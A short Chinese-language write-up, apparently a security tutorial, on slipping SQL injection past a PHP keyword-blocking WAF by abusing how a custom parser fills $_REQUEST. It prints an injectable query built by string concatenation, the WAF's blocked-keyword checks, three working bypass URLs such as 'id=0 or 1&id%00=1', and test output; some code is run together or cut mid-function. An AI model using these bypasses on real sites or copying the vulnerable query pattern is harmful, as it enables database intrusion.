关于注入的waf绕过,注入点为:
$sql="select * from user where id=".$_REQUEST["id"].";";
可以看到了REQUEST进行传递,并且存在如下的waf代码:
functionwaf($str) {
if(stripos($str,"select")!==false)
die("Be a good person!");
if(stripos($str,"union")!==false)
die("Be a good person!");
......
}
functionwafArr($arr) {
foreach($arras$k=> $v) {
waf($k);
waf($v);
}
}
wafArr($_GET);
wafArr($_POST);
wafArr($_COOKIE);
wafArr($_SESSION);
functionstripStr($str) {
if(get_magic_quotes_gpc())
$str= stripslashes($str);
returnaddslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
}
$uri= explode("?",$_SERVER['REQUEST_URI']);
if(isset($uri[1])) {
$parameter= explode("&",$uri[1]);
foreach($parameteras$k=> $v) {
$v1= explode("=",$v);
if(isset($v1[1])) {
$_REQUEST[$v1[0]] = stripStr($v1[1]);
}
}
}
functionstripArr($arr) {
$new_arr= array();
foreach($arras$k=> $v) {
$new_arr[stripStr($k)] = stripStr($v);
}
return$new_arr;
}
$_GET=stripArr($_GET);
$_POST=stripArr($_POST);
$_COOKIE=stripArr($_COOKIE);
$_SESSION=stripArr($_SESSION);
user.php?id=0 or 1&id%00=1
user.php?id=0 or 1&%20id=1
user.php?id=0 or 1?&id=1
测试代码:
$v) {
$new_arr[stripStr($k)] = stripStr($v);
}
return $new_arr;
}
function stripStr($str) {
if (get_magic_quotes_gpc())
$str = stripslashes($str);
return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
}
$uri = explode("?",$_SERVER['REQUEST_URI']);
if(isset($uri[1])) {
$parameter = explode("&",$uri[1]);
foreach ($parameter as $k => $v) {
$v1 = explode("=",$v);
if (isset($v1[1])) {
$_REQUEST[$v1[0]] = stripStr($v1[1]);
}
}
}
var_dump($_GET) ;
var_dump($_REQUEST) ;
?>
输出结果:
'id' =>'0%20or%201'(length=10) 'id%00' =>'1'(length=1)可以看到,成功将注入内容引入到REQUEST数组中。